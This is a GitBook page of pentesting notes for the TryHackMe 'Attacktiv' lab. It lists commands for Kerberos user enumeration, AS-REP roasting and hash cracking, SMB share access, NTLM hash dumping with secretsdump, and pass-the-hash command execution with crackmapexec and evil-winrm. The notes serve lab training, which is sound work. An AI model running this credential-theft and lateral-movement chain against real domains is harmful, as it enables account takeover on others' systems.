Notes
  • 👀About me
  • ℹī¸Good Reads
  • 🌐Web
    • Web Pentesting Checklist
    • Insecure Deserialization
    • Blind XPath Injection
    • GraphQL
    • Reverse Shells
      • IIS
    • Content-Security-Policy
      • XSS (Static Nonce in CSP)
    • LLM (Large Language Models)
  • 📘Windows API
    • C# - P/Invoke
  • ☕Miscellaneous Topics
    • Phishing with Gophish
    • Pentest Diaries
      • SQL Queries via Grafana
      • LDAP Pass Back Attack
      • Misconfigured File Upload to RCE
  • 🧃Hack The Box
    • Intelligence
    • Seal
    • Under Construction
    • Previse
    • Return
    • Sauna
    • Nest
  • 📕TryHackMe
    • Wordpress CVE-2021-29447
    • Attacktiv
    • Fortress
    • internal
  • 🛠ī¸Cheatsheet
    • Anti-Forensic Techniques
    • JSON - jq
    • Docker
    • Hidden Secrets
    • Database Exploitation
      • PostgreSQL
        • Blind SQLi script
      • SQL Server
    • C Sharp
    • Reversing
      • Windows
    • SSH
    • Python
      • Miscellaneous Scripts
        • Credential Bruteforcing a CLI service
    • Privilege Escalation
      • Windows
    • socat
    • OSINT
      • Shodan
    • Installation
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe

Attacktiv

* Kerberos enumerating users kerbrute userenum --dc <IP> -d "<domain>" userlist.txt [domain can be enumerated vai enum4linux] nmap --script krb5-enum-users --script-args='krb5-enum-users.realm="<domain>",userdb=<filepath>' <IP> -p 88

Kerberos credentials are case sensitive. So therefore, "NAME@ibm.com" and "name@ibm.com" and "NaMe@ibm.com" are 3 separate credentials.

* users with no-preauth-required GetNPUsers.py <domain>/ -dc-ip <ip> -usersfile vu2 -no-pass [vu2 contains only names abc, no abc@xyz] [It is important tho, to specify -no-pass in the script, otherwise a badpwdcount entry will be added to the user]

hashcat.bin -m 18200 --force -a 0 as-rep.hash passwordlist.txt [a=0 for wordslist]

- list shares smbclient -U "<uname>%<pwd>" -L <IP> - connecting to sharexs smbclient -U "<uname>%<pwd>" //<IP>/<share>

* Dumping secrets like NTLM hashes,etc. secretsdump.py <domain>/<uname>:<pwd>@<IP>

- NTLM hash with only NT component: Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc aad3b435b51404eeaad3b435b51404ee = no password

- Running cmds using NTLM hash docker run docker.io/byt3bl33d3r/crackmapexec:latest smb 10.10.115.121 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -x whoami evil-winrm -i 10.10.252.217 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

* Check for open RDP ports, use remmina

PreviousWordpress CVE-2021-29447NextFortress

Last updated 3 years ago

Was this helpful?

📕